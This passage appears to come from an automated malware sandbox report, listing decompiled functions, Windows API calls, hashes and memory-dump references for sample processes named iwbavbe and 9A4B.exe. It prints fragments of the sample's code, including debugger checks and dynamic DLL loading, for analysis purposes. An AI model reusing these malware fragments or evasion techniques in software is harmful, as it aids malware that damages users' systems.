Opcode ID: 2a49fbe38ca64fb741f40d4948de9f53ca9b58de087dcfee36be181988c04280
Instruction ID: 934e5413d765c160eebb9f9f9fdb0e9e8b4c73449cfdb306a0b7eda1d20c3935
Opcode Fuzzy Hash: 2a49fbe38ca64fb741f40d4948de9f53ca9b58de087dcfee36be181988c04280
Instruction Fuzzy Hash: 70F03073604104EADB007A959C41AAA3359FB05325F248537BE13B50E1C63D8612B727

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 004015DB, Relevance: .1, Instructions: 55COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.741438852.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ed2891f3b553ceccb1197e576bb3cc6c62237795c24559e61feaca1efd6c1519
Instruction ID: fd271a60069478d9e85e2fad7deaa7712c787be95f3be9aeab1b4b987b801010
Opcode Fuzzy Hash: ed2891f3b553ceccb1197e576bb3cc6c62237795c24559e61feaca1efd6c1519
Instruction Fuzzy Hash: D901AF73818B07AB43709A7C4D8901E7F955A91230B494B6DB672B3EFAE634C90283C5

Uniqueness

Uniqueness Score: -1.00%

Function 0040156A, Relevance: .0, Instructions: 44COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.741438852.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 98ce89cfeeb5ddd9997256b5ea2b205477bd2588cb9c6c16e4865f99cdeb7182
Instruction ID: 4f6bc8fa09aa5bdcf42d43fc69351f521f911aca1d628afa7bc85602f15907e6
Opcode Fuzzy Hash: 98ce89cfeeb5ddd9997256b5ea2b205477bd2588cb9c6c16e4865f99cdeb7182
Instruction Fuzzy Hash: 0D019E76558F0B6F43509D3C4A8554ABF525A9A1307C40B2CB272B3BFAD734C5018380

Uniqueness

Uniqueness Score: -1.00%

Function 0040163B, Relevance: .0, Instructions: 14COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.741438852.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 00b9d1c930405a9e521bac72b58a8e4ce3d6aa83d2bf40b4aa186e223dc26d8b
Instruction ID: 654c97a3283950a455190b9e492aed8f63260678440c25cc401c338180771753
Opcode Fuzzy Hash: 00b9d1c930405a9e521bac72b58a8e4ce3d6aa83d2bf40b4aa186e223dc26d8b
Instruction Fuzzy Hash: 1BD022B2474A16120612853C0C4802E7E0A08C31303C50F443633F30FDC218890743C4

Uniqueness

Uniqueness Score: -1.00%

Analysis Process: iwbavbe PID: 5156 Parent PID: 968 iwbavbeCOMMON

Executed Functions

Function 00424690, Relevance: 1.5, APIs: 1, Instructions: 7COMMON

Download Yara Rule

APIs

RtlEncodePointer.NTDLL(00000000,?,0041D04B,?,?,00424800), ref: 00424697

Memory Dump Source

Source File: 0000000A.00000002.802540946.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000A.00000002.802532887.0000000000400000.00000002.00020000.sdmp Download File
Associated: 0000000A.00000002.802574575.000000000043E000.00000004.00020000.sdmp Download File
Associated: 0000000A.00000002.802804951.0000000002B97000.00000002.00020000.sdmp Download File

Similarity

API ID: EncodePointer
String ID:
API String ID: 2118026453-0
Opcode ID: 2ea03846aa0b567229e74ed0acf05d785ccbcc0ad5cbdc7d91d64925a7e8509b
Instruction ID: d35c21fdf9697fae3b8ca4ac9df821949a654717cf36e16e5de8d48c8df027d1
Opcode Fuzzy Hash: 2ea03846aa0b567229e74ed0acf05d785ccbcc0ad5cbdc7d91d64925a7e8509b
Instruction Fuzzy Hash: 10A01132088208A3C2002282A80AF023A0CE3CCBA2F080020F20C0A0A00AA2A82080AA

Uniqueness

Uniqueness Score: -1.00%

Function 0041C890, Relevance: 1.5, APIs: 1, Instructions: 5
COMMON

Download Yara Rule

C-Code - Quality: 100%

			_entry_() {
				void* _t3;
				void* _t4;

				E00421A60(); // executed
				return L0041C8B0(_t3, _t4);
			}

0x0041c895
0x0041c8a0

APIs

___security_init_cookie.LIBCMTD ref: 0041C895

Memory Dump Source

Source File: 0000000A.00000002.802540946.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000A.00000002.802532887.0000000000400000.00000002.00020000.sdmp Download File
Associated: 0000000A.00000002.802574575.000000000043E000.00000004.00020000.sdmp Download File
Associated: 0000000A.00000002.802804951.0000000002B97000.00000002.00020000.sdmp Download File

Similarity

API ID: ___security_init_cookie
String ID:
API String ID: 3657697845-0
Opcode ID: 989a3b1cde8d75633caca1be5d45cca953f1b250fff02efc506c9fb5d63ec8e4
Instruction ID: f581d8896d31454078740312df8d18a426b6ba7321f9ba9bd526a071552ec979
Opcode Fuzzy Hash: 989a3b1cde8d75633caca1be5d45cca953f1b250fff02efc506c9fb5d63ec8e4
Instruction Fuzzy Hash: ABA0026154569C16155133A71987A4A754D48D07597D5001B7519021135D5CA98240AE

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 00426440, Relevance: 7.6, APIs: 5, Instructions: 59
COMMON

Download Yara Rule

C-Code - Quality: 85%

			E00426440(intOrPtr __eax, intOrPtr __ebx, intOrPtr __ecx, intOrPtr __edx, intOrPtr __edi, intOrPtr __esi, char _a4) {
				intOrPtr _v0;
				void* _v804;
				intOrPtr _v808;
				intOrPtr _v812;
				intOrPtr _t6;
				intOrPtr _t11;
				long _t15;
				intOrPtr _t19;
				intOrPtr _t20;
				intOrPtr _t21;
				intOrPtr _t22;
				intOrPtr _t23;
				intOrPtr _t24;
				intOrPtr _t25;
				intOrPtr* _t29;
				void* _t34;

				_t25 = __esi;
				_t24 = __edi;
				_t22 = __edx;
				_t20 = __ecx;
				_t19 = __ebx;
				_t6 = __eax;
				_t34 = _t20 -  *0x43e4a0; // 0x69239696
				if(_t34 == 0) {
					asm("repe ret");
				}
				 *0x43ff40 = _t6;
				 *0x43ff3c = _t20;
				 *0x43ff38 = _t22;
				 *0x43ff34 = _t19;
				 *0x43ff30 = _t25;
				 *0x43ff2c = _t24;
				 *0x43ff58 = ss;
				 *0x43ff4c = cs;
				 *0x43ff28 = ds;
				 *0x43ff24 = es;
				 *0x43ff20 = fs;
				 *0x43ff1c = gs;
				asm("pushfd");
				_pop( *0x43ff50);
				 *0x43ff44 =  *_t29;
				 *0x43ff48 = _v0;
				 *0x43ff54 =  &_a4;
				 *0x43fe90 = 0x10001;
				_t11 =  *0x43ff48; // 0x0
				 *0x43fe44 = _t11;
				 *0x43fe38 = 0xc0000409;
				 *0x43fe3c = 1;
				_t21 =  *0x43e4a0; // 0x69239696
				_v812 = _t21;
				_t23 =  *0x43e4a4; // 0x96dc6969
				_v808 = _t23;
				 *0x43fe88 = IsDebuggerPresent();
				_push(1);
				E00426420(_t12);
				SetUnhandledExceptionFilter(0);
				_t15 = UnhandledExceptionFilter(0x409f6c);
				if( *0x43fe88 == 0) {
					_push(1);
					E00426420(_t15);
				}
				return TerminateProcess(GetCurrentProcess(), 0xc0000409);
			}

APIs

IsDebuggerPresent.KERNEL32 ref: 0042EA5D
SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 0042EA74
UnhandledExceptionFilter.KERNEL32(00409F6C), ref: 0042EA7F
GetCurrentProcess.KERNEL32(C0000409), ref: 0042EA9D
TerminateProcess.KERNEL32(00000000), ref: 0042EAA4

Memory Dump Source

Source File: 0000000A.00000002.802540946.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000A.00000002.802532887.0000000000400000.00000002.00020000.sdmp Download File
Associated: 0000000A.00000002.802574575.000000000043E000.00000004.00020000.sdmp Download File
Associated: 0000000A.00000002.802804951.0000000002B97000.00000002.00020000.sdmp Download File

Similarity

API ID: ExceptionFilterProcessUnhandled$CurrentDebuggerPresentTerminate
String ID:
API String ID: 2579439406-0
Opcode ID: c59e8f8781e30871d07173c26a070c807a816239214ee763875908e28398e7d7
Instruction ID: cfa9524a3b12b8b773824b8592d4e3ae2adb55ecfbbfffa1025ce60c7e413f30
Opcode Fuzzy Hash: c59e8f8781e30871d07173c26a070c807a816239214ee763875908e28398e7d7
Instruction Fuzzy Hash: 8621F0B9D012049BC300DF55FA866487BA4BB5E325F60607BED08963B2E7B45989CF4E

Uniqueness

Uniqueness Score: -1.00%

Analysis Process: 9A4B.exe PID: 5240 Parent PID: 3424 9A4B.exeCOMMON

Executed Functions

Function 00421DD0, Relevance: 1.5, APIs: 1, Instructions: 7COMMON

Download Yara Rule

APIs

RtlEncodePointer.NTDLL(00000000,?,0041D18B,?,?,00421F40), ref: 00421DD7

Memory Dump Source

Source File: 0000000B.00000002.794575212.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000B.00000002.794562612.0000000000400000.00000002.00020000.sdmp Download File
Associated: 0000000B.00000002.794620914.000000000043E000.00000004.00020000.sdmp Download File
Associated: 0000000B.00000002.794833779.0000000002B36000.00000002.00020000.sdmp Download File

Similarity

API ID: EncodePointer
String ID:
API String ID: 2118026453-0
Opcode ID: 2ea03846aa0b567229e74ed0acf05d785ccbcc0ad5cbdc7d91d64925a7e8509b
Instruction ID: d35c21fdf9697fae3b8ca4ac9df821949a654717cf36e16e5de8d48c8df027d1
Opcode Fuzzy Hash: 2ea03846aa0b567229e74ed0acf05d785ccbcc0ad5cbdc7d91d64925a7e8509b
Instruction Fuzzy Hash: 10A01132088208A3C2002282A80AF023A0CE3CCBA2F080020F20C0A0A00AA2A82080AA

Uniqueness

Uniqueness Score: -1.00%

Function 0041C9D0, Relevance: 1.5, APIs: 1, Instructions: 5
COMMON

Download Yara Rule

C-Code - Quality: 100%

			_entry_() {
				void* _t3;
				void* _t4;

				E00423610(); // executed
				return L0041C9F0(_t3, _t4);
			}

0x0041c9d5
0x0041c9e0

APIs

___security_init_cookie.LIBCMTD ref: 0041C9D5

Memory Dump Source

Source File: 0000000B.00000002.794575212.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000B.00000002.794562612.0000000000400000.00000002.00020000.sdmp Download File
Associated: 0000000B.00000002.794620914.000000000043E000.00000004.00020000.sdmp Download File
Associated: 0000000B.00000002.794833779.0000000002B36000.00000002.00020000.sdmp Download File

Similarity

API ID: ___security_init_cookie
String ID:
API String ID: 3657697845-0
Opcode ID: 801511838882745d238d90719077076ab6878bacc9057c11ec7af23bfa7a170d
Instruction ID: c8c14bf76a122821297559dcf53766d82a8b8c99ae39c25128166b10989ce3c5
Opcode Fuzzy Hash: 801511838882745d238d90719077076ab6878bacc9057c11ec7af23bfa7a170d
Instruction Fuzzy Hash: 65A002611546582609603BA7184794A795D58C07197D5152A7558233031C5CAD4144AE

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 00420A60, Relevance: 7.6, APIs: 5, Instructions: 59
COMMON

Download Yara Rule

C-Code - Quality: 85%

			E00420A60(intOrPtr __eax, intOrPtr __ebx, intOrPtr __ecx, intOrPtr __edx, intOrPtr __edi, intOrPtr __esi, char _a4) {
				intOrPtr _v0;
				void* _v804;
				intOrPtr _v808;
				intOrPtr _v812;
				intOrPtr _t6;
				intOrPtr _t11;
				long _t15;
				intOrPtr _t19;
				intOrPtr _t20;
				intOrPtr _t21;
				intOrPtr _t22;
				intOrPtr _t23;
				intOrPtr _t24;
				intOrPtr _t25;
				intOrPtr* _t29;
				void* _t34;

				_t25 = __esi;
				_t24 = __edi;
				_t22 = __edx;
				_t20 = __ecx;
				_t19 = __ebx;
				_t6 = __eax;
				_t34 = _t20 -  *0x43e1d4; // 0xd8c78e57
				if(_t34 == 0) {
					asm("repe ret");
				}
				 *0x43ff30 = _t6;
				 *0x43ff2c = _t20;
				 *0x43ff28 = _t22;
				 *0x43ff24 = _t19;
				 *0x43ff20 = _t25;
				 *0x43ff1c = _t24;
				 *0x43ff48 = ss;
				 *0x43ff3c = cs;
				 *0x43ff18 = ds;
				 *0x43ff14 = es;
				 *0x43ff10 = fs;
				 *0x43ff0c = gs;
				asm("pushfd");
				_pop( *0x43ff40);
				 *0x43ff34 =  *_t29;
				 *0x43ff38 = _v0;
				 *0x43ff44 =  &_a4;
				 *0x43fe80 = 0x10001;
				_t11 =  *0x43ff38; // 0x0
				 *0x43fe34 = _t11;
				 *0x43fe28 = 0xc0000409;
				 *0x43fe2c = 1;
				_t21 =  *0x43e1d4; // 0xd8c78e57
				_v812 = _t21;
				_t23 =  *0x43e1d8; // 0x273871a8
				_v808 = _t23;
				 *0x43fe78 = IsDebuggerPresent();
				_push(1);
				E00427220(_t12);
				SetUnhandledExceptionFilter(0);
				_t15 = UnhandledExceptionFilter(0x4093ec);
				if( *0x43fe78 == 0) {
					_push(1);
					E00427220(_t15);
				}
				return TerminateProcess(GetCurrentProcess(), 0xc0000409);
			}

0x00420a60
0x00420a60
0x00420a60
0x00420a60
0x00420a60
0x00420a60
0x00420a60
0x00420a66
0x00420a68
0x00420a68
0x0042d2bb
0x0042d2c0
0x0042d2c6
0x0042d2cc
0x0042d2d2
0x0042d2d8
0x0042d2de
0x0042d2e5
0x0042d2ec
0x0042d2f3
0x0042d2fa
0x0042d301
0x0042d308
0x0042d309
0x0042d312
0x0042d31a
0x0042d322
0x0042d32d
0x0042d337
0x0042d33c
0x0042d341
0x0042d34b
0x0042d355
0x0042d35b
0x0042d361
0x0042d367
0x0042d373
0x0042d378
0x0042d37a
0x0042d384
0x0042d38f
0x0042d39c
0x0042d39e
0x0042d3a0
0x0042d3a5
0x0042d3bd

APIs

IsDebuggerPresent.KERNEL32 ref: 0042D36D
SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 0042D384
UnhandledExceptionFilter.KERNEL32(004093EC), ref: 0042D38F
GetCurrentProcess.KERNEL32(C0000409), ref: 0042D3AD
TerminateProcess.KERNEL32(00000000), ref: 0042D3B4

Memory Dump Source

Source File: 0000000B.00000002.794575212.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000B.00000002.794562612.0000000000400000.00000002.00020000.sdmp Download File
Associated: 0000000B.00000002.794620914.000000000043E000.00000004.00020000.sdmp Download File
Associated: 0000000B.00000002.794833779.0000000002B36000.00000002.00020000.sdmp Download File

Similarity

API ID: ExceptionFilterProcessUnhandled$CurrentDebuggerPresentTerminate
String ID:
API String ID: 2579439406-0
Opcode ID: 4987ac8c4a0f9443f17621420085ba643395908a36751d4815f2a37dc711d331
Instruction ID: 469f7c5c464fc5890b8207f2600d0d7e6f376cd6ec0b1ee7d2704e24f1ef85c5
Opcode Fuzzy Hash: 4987ac8c4a0f9443f17621420085ba643395908a36751d4815f2a37dc711d331
Instruction Fuzzy Hash: 7821F3B9D01200DBC700DF55FA856587BA0BB5E315F50607BED08963B2E7B48989CF9E

Uniqueness

Uniqueness Score: -1.00%

Analysis Process: 9A4B.exe PID: 3864 Parent PID: 5240 9A4B.exeCOMMON

Executed Functions

Function 004017EA, Relevance: 3.1, APIs: 2, Instructions: 54sleepnativeCOMMON

Download Yara Rule

APIs

Sleep.KERNELBASE(00001388), ref: 00401896
NtTerminateProcess.NTDLL(000000FF,00000000,?,?,?,?), ref: 004018BE

Memory Dump Source

Source File: 0000000C.00000002.807004841.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Similarity

API ID: ProcessSleepTerminate
String ID:
API String ID: 417527130-0
Opcode ID: 093506dd62a563d0441f59a8a05229de1ffc0c7044889409d056a06326e13c21
Instruction ID: e26adff564c5d3d37a4e8030c80122da76794021b5cb737f4d399c49089bd509
Opcode Fuzzy Hash: 093506dd62a563d0441f59a8a05229de1ffc0c7044889409d056a06326e13c21
Instruction Fuzzy Hash: 7001B537604205EADB007EB59D819A93B68AF04365F248777BA12B91F1C938C652A71B

Uniqueness

Uniqueness Score: -1.00%

Function 0040185B, Relevance: 3.0, APIs: 2, Instructions: 50sleepnativeCOMMON

Download Yara Rule

APIs

Sleep.KERNELBASE(00001388), ref: 00401896
NtTerminateProcess.NTDLL(000000FF,00000000,?,?,?,?), ref: 004018BE

Memory Dump Source

Source File: 0000000C.00000002.807004841.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Similarity

API ID: ProcessSleepTerminate
String ID:
API String ID: 417527130-0
Opcode ID: 1770049ace98a7458e43cc493052677b39fde3cfbd9b887cff6db6baf57fddbe
Instruction ID: a7be6de418827693af2ab350a5dd922dd862006562865765dfea97ffb81bfcac
Opcode Fuzzy Hash: 1770049ace98a7458e43cc493052677b39fde3cfbd9b887cff6db6baf57fddbe
Instruction Fuzzy Hash: BF014F33604204FAEB047A929C45DAA3628AB04355F30C533BA13B90F1D97CCB12A72B

Uniqueness

Uniqueness Score: -1.00%

Function 00401866, Relevance: 3.0, APIs: 2, Instructions: 45sleepnativeCOMMON

Download Yara Rule

APIs

Sleep.KERNELBASE(00001388), ref: 00401896
NtTerminateProcess.NTDLL(000000FF,00000000,?,?,?,?), ref: 004018BE

Memory Dump Source

Source File: 0000000C.00000002.807004841.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Similarity

API ID: ProcessSleepTerminate
String ID:
API String ID: 417527130-0
Opcode ID: dc1226d4bc2db8ad8be4ba055d694b18d68c57301a1c136da16781e7116eb212
Instruction ID: e54376f1e00a1b05e1b0a4da34ea36749e6d38f0b530b75836749d90234edb27
Opcode Fuzzy Hash: dc1226d4bc2db8ad8be4ba055d694b18d68c57301a1c136da16781e7116eb212
Instruction Fuzzy Hash: DB018637604204EBDB047AD29C41EAA3725AF14315F24C177FE12BA0F1D53D8712A72B

Uniqueness

Uniqueness Score: -1.00%

Function 00401884, Relevance: 3.0, APIs: 2, Instructions: 40sleepnativeCOMMON

Download Yara Rule

APIs

Sleep.KERNELBASE(00001388), ref: 00401896
NtTerminateProcess.NTDLL(000000FF,00000000,?,?,?,?), ref: 004018BE

Memory Dump Source

Source File: 0000000C.00000002.807004841.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Similarity

API ID: ProcessSleepTerminate
String ID:
API String ID: 417527130-0
Opcode ID: 06c47be1babc5c9914373f87bf5e5a6e30058494f01aa4c1fe81d8ba10f9d84d
Instruction ID: 5cccd4a7217d25da87a080ae0d04b05742d3a6582cdde403d0d4fd1f208729a0
Opcode Fuzzy Hash: 06c47be1babc5c9914373f87bf5e5a6e30058494f01aa4c1fe81d8ba10f9d84d
Instruction Fuzzy Hash: DFF01237644205FBDB047A919C41EAA3729AF44355F20C137BB13790F1C57C8652A72B

Uniqueness

Uniqueness Score: -1.00%

Function 0040187A, Relevance: 3.0, APIs: 2, Instructions: 39sleepnativeCOMMON

Download Yara Rule

APIs

Sleep.KERNELBASE(00001388), ref: 00401896
NtTerminateProcess.NTDLL(000000FF,00000000,?,?,?,?), ref: 004018BE

Memory Dump Source

Source File: 0000000C.00000002.807004841.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Similarity

API ID: ProcessSleepTerminate
String ID:
API String ID: 417527130-0
Opcode ID: d2cc8ded923418a485b63d44c0e9af69491e3bef1ae54f85540c04aa078cd151
Instruction ID: 5d822ad72a3bc969102d855418471fb3ff8b776078c2435d27f60d427d7e2b1d
Opcode Fuzzy Hash: d2cc8ded923418a485b63d44c0e9af69491e3bef1ae54f85540c04aa078cd151
Instruction Fuzzy Hash: 88F0FF33604205EBDB047AD59C41EAA3729AF04315F20C537BA12790F1CA3D8612AB2B

Uniqueness

Uniqueness Score: -1.00%

Function 004018D3, Relevance: 1.5, APIs: 1, Instructions: 45
nativeCOMMON

Download Yara Rule

C-Code - Quality: 46%

			E004018D3(intOrPtr* __eax, void* __ebx, void* __ecx, void* __edi) {

				 *__eax =  *__eax + __eax;
				__eax = L0040118A(__eax, __ebx, __ecx, __edi, __eflags);
				_pop(__edi);
				_pop(__ebx);
				__esp = __ebp;
				_pop(__ebp);
				return __eax;
			}

0x004018db
0x004018e5
0x004018ea
0x004018ec
0x004018ed
0x004018ed
0x004018ee

APIs

NtTerminateProcess.NTDLL(000000FF,00000000,?,?,?,?), ref: 004018BE

Memory Dump Source

Source File: 0000000C.00000002.807004841.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Similarity

API ID: ProcessTerminate
String ID:
API String ID: 560597551-0
Opcode ID: 2828a8cd754e6382065d6a4fb934443d5e18941ecfa79c6ebd95b6c34ee4dc7b
Instruction ID: 169e4967cc86e0c75baf1baab42a0cf60a3c7d0871e4951e2e4ac70a2d426d6d
Opcode Fuzzy Hash: 2828a8cd754e6382065d6a4fb934443d5e18941ecfa79c6ebd95b6c34ee4dc7b
Instruction Fuzzy Hash: 49F0C873604150EBD7013AA19C42AF63769EF01321F248137F923A50F1C63D8612B72B

Uniqueness

Uniqueness Score: -1.00%

Function 00401888, Relevance: 1.5, APIs: 1, Instructions: 37nativeCOMMON

Download Yara Rule

APIs

NtTerminateProcess.NTDLL(000000FF,00000000,?,?,?,?), ref: 004018BE

Memory Dump Source

Source File: 0000000C.00000002.807004841.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Similarity

API ID: ProcessTerminate
String ID:
API String ID: 560597551-0
Opcode ID: 2a49fbe38ca64fb741f40d4948de9f53ca9b58de087dcfee36be181988c04280
Instruction ID: 934e5413d765c160eebb9f9f9fdb0e9e8b4c73449cfdb306a0b7eda1d20c3935
Opcode Fuzzy Hash: 2a49fbe38ca64fb741f40d4948de9f53ca9b58de087dcfee36be181988c04280
Instruction Fuzzy Hash: 70F03073604104EADB007A959C41AAA3359FB05325F248537BE13B50E1C63D8612B727

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Analysis Process: iwbavbe PID: 6200 Parent PID: 5156 iwbavbeCOMMON

Executed Functions

Function 004026C8, Relevance: 1.5, APIs: 1, Instructions: 47
libraryloaderCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E004026C8(void* __ecx, void* __eflags, intOrPtr _a4, intOrPtr _a8) {
				struct _OBJDIR_INFORMATION _v8;
				char _v16;
				void* __ebx;
				void* __edi;
				void* __ebp;
				long _t12;
				void* _t13;
				void* _t16;
				intOrPtr _t20;
				void* _t22;
				void* _t25;
				UNICODE_STRING* _t26;
				intOrPtr* _t28;

				_t20 =  *_t28;
				L0040118A(0x2700, _t16, _t20, _t22, __eflags);
				_t17 = _a4;
				_t26 =  &_v16;
				 *((intOrPtr*)(_a4 + 0xc))(_t26, _a8, __ecx, 0x51, _t22, _t25, _t16);
				_t23 =  &_v8;
				_t12 = LdrLoadDll(0, 0, _t26,  &_v8);
				_t31 = _t12;
				if(_t12 != 0) {
					_v8 = 0;
				}
				_t13 = 0x2700;
				L0040118A(_t13, _t17, 0x51, _t23, _t31);
				return _v8;
			}

0x004026ee
0x004026fb
0x00402700
0x00402703
0x0040270a
0x0040270d
0x00402716
0x00402719
0x0040271b
0x0040271d
0x0040271d
0x00402730
0x0040274c
0x00000000

APIs

LdrLoadDll.NTDLL(00000000,00000000,?,?), ref: 00402716

Memory Dump Source

Source File: 0000000D.00000001.802129695.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Similarity

API ID: Load
String ID:
API String ID: 2234796835-0
Opcode ID: fb1d288646eac737f9562cb4a2b5784598c588a48ffd6e473a319c7d6c35b7e7
Instruction ID: 40dc2efb075a3afc972c71eb076c1c0414e6b27fd6f2b5cc45f04f39bc90cd3d
Opcode Fuzzy Hash: fb1d288646eac737f9562cb4a2b5784598c588a48ffd6e473a319c7d6c35b7e7
Instruction Fuzzy Hash: C9016231608504E7DB006A419E4DBAA7764AB44754F208437FA067B1C0D6FD9A4BB76B

Uniqueness

Uniqueness Score: -1.00%

Function 004026D3, Relevance: 1.5, APIs: 1, Instructions: 42
libraryloaderCOMMON

Download Yara Rule

C-Code - Quality: 91%

			E004026D3(void* __ebx, void* __ecx, void* __edi, void* __eflags) {
				long _t13;
				void* _t14;
				struct _OBJDIR_INFORMATION _t16;
				intOrPtr _t21;
				UNICODE_STRING* _t26;
				void* _t28;
				intOrPtr* _t30;

				asm("sbb eax, [eax]");
				_t21 =  *_t30;
				L0040118A(0x2700, __ebx, _t21, __edi, __eflags);
				_t18 =  *((intOrPtr*)(_t28 + 8));
				_t26 = _t28 - 0xc;
				 *((intOrPtr*)( *((intOrPtr*)(_t28 + 8)) + 0xc))(_t26,  *((intOrPtr*)(_t28 + 0xc)), __ecx, 0x51);
				_t24 = _t28 - 4;
				_t13 = LdrLoadDll(0, 0, _t26, _t28 - 4);
				_t34 = _t13;
				if(_t13 != 0) {
					 *(_t28 - 4) = 0;
				}
				_t14 = 0x2700;
				L0040118A(_t14, _t18, 0x51, _t24, _t34);
				_t16 =  *(_t28 - 4);
				return _t16;
			}

0x004026d3
0x004026ee
0x004026fb
0x00402700
0x00402703
0x0040270a
0x0040270d
0x00402716
0x00402719
0x0040271b
0x0040271d
0x0040271d
0x00402730
0x0040274c
0x00402751
0x00402758

APIs

LdrLoadDll.NTDLL(00000000,00000000,?,?), ref: 00402716

Memory Dump Source

Source File: 0000000D.00000001.802129695.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Similarity

API ID: Load
String ID:
API String ID: 2234796835-0
Opcode ID: 4e0e5ee68eecc59290c08c9297519d89f54fb23726755cfbd71717b5480a64e1
Instruction ID: 9584a62b05b7d8a9b2a776b7033dab2b10b945a71b24260a1d24854f7785f2a5
Opcode Fuzzy Hash: 4e0e5ee68eecc59290c08c9297519d89f54fb23726755cfbd71717b5480a64e1
Instruction Fuzzy Hash: 9C01D131608500EBCB019E419E4DBAA3760AF04304F208477E606BF1D0C6FD9607FB6B

Uniqueness

Uniqueness Score: -1.00%

Function 004026DF, Relevance: 1.5, APIs: 1, Instructions: 38
libraryloaderCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E004026DF(void* __ebx, signed int __ecx, void* __edi) {
				long _t12;
				void* _t13;
				struct _OBJDIR_INFORMATION _t15;
				signed char _t20;
				intOrPtr _t21;
				UNICODE_STRING* _t26;
				void* _t28;
				intOrPtr* _t30;
				signed char _t33;

				_t20 = __ecx |  *0xebc2f5eb;
				_t33 = _t20;
				_t21 =  *_t30;
				L0040118A(0x2700, __ebx, _t21, __edi, _t33);
				_t17 =  *((intOrPtr*)(_t28 + 8));
				_t26 = _t28 - 0xc;
				 *((intOrPtr*)( *((intOrPtr*)(_t28 + 8)) + 0xc))(_t26,  *((intOrPtr*)(_t28 + 0xc)), _t20, 0x51);
				_t24 = _t28 - 4;
				_t12 = LdrLoadDll(0, 0, _t26, _t28 - 4);
				_t34 = _t12;
				if(_t12 != 0) {
					 *(_t28 - 4) = 0;
				}
				_t13 = 0x2700;
				L0040118A(_t13, _t17, 0x51, _t24, _t34);
				_t15 =  *(_t28 - 4);
				return _t15;
			}

0x004026df
0x004026df
0x004026ee
0x004026fb
0x00402700
0x00402703
0x0040270a
0x0040270d
0x00402716
0x00402719
0x0040271b
0x0040271d
0x0040271d
0x00402730
0x0040274c
0x00402751
0x00402758

APIs

LdrLoadDll.NTDLL(00000000,00000000,?,?), ref: 00402716

Memory Dump Source

Source File: 0000000D.00000001.802129695.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Similarity

API ID: Load
String ID:
API String ID: 2234796835-0
Opcode ID: 66d6ed5a5f97da4cd1e2364b4ff1c60b02b4f842bf72e481ca125f9fdb398aad
Instruction ID: 8c80e095348b3890610be7f7119ddd6f2bf491658c7e2b08e3b2f8ba4f36ee70
Opcode Fuzzy Hash: 66d6ed5a5f97da4cd1e2364b4ff1c60b02b4f842bf72e481ca125f9fdb398aad
Instruction Fuzzy Hash: 61F0C231608505F7CB059B919A5DB9A7B70AF48358F208037E6467F1C0C3BC9A0AEB6B

Uniqueness

Uniqueness Score: -1.00%

Function 004026F6, Relevance: 1.5, APIs: 1, Instructions: 33
libraryloaderCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E004026F6(void* __ebx, void* __ecx, signed int __edx, void* __edi) {
				void* _t12;
				long _t15;
				void* _t16;
				struct _OBJDIR_INFORMATION _t18;
				intOrPtr _t23;
				UNICODE_STRING* _t30;
				signed int _t32;
				intOrPtr* _t34;
				signed char _t37;

				_t37 = __edx |  *(__ebx + _t32 * 8 - 0xe);
				_t23 =  *_t34;
				L0040118A(_t12, __ebx, _t23, __edi, _t37);
				_t20 =  *((intOrPtr*)(_t32 + 8));
				_t30 = _t32 - 0xc;
				 *((intOrPtr*)( *((intOrPtr*)(_t32 + 8)) + 0xc))(_t30,  *((intOrPtr*)(_t32 + 0xc)), __ecx, 0x51);
				_t28 = _t32 - 4;
				_t15 = LdrLoadDll(0, 0, _t30, _t32 - 4);
				_t38 = _t15;
				if(_t15 != 0) {
					 *(_t32 - 4) = 0;
				}
				_t16 = 0x2700;
				L0040118A(_t16, _t20, 0x51, _t28, _t38);
				_t18 =  *(_t32 - 4);
				return _t18;
			}

0x004026f6
0x004026ee
0x004026fb
0x00402700
0x00402703
0x0040270a
0x0040270d
0x00402716
0x00402719
0x0040271b
0x0040271d
0x0040271d
0x00402730
0x0040274c
0x00402751
0x00402758

APIs

LdrLoadDll.NTDLL(00000000,00000000,?,?), ref: 00402716

Memory Dump Source

Source File: 0000000D.00000001.802129695.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Similarity

API ID: Load
String ID:
API String ID: 2234796835-0
Opcode ID: 963b1ec641e54d0a3c948b9f5a1a39febab9ff735ad4ee73f913fea554ebc1e3
Instruction ID: d7b1c623c9884319f2b4b1abd5d885049190cb82f350ff51d45b82dffe9b7bfe
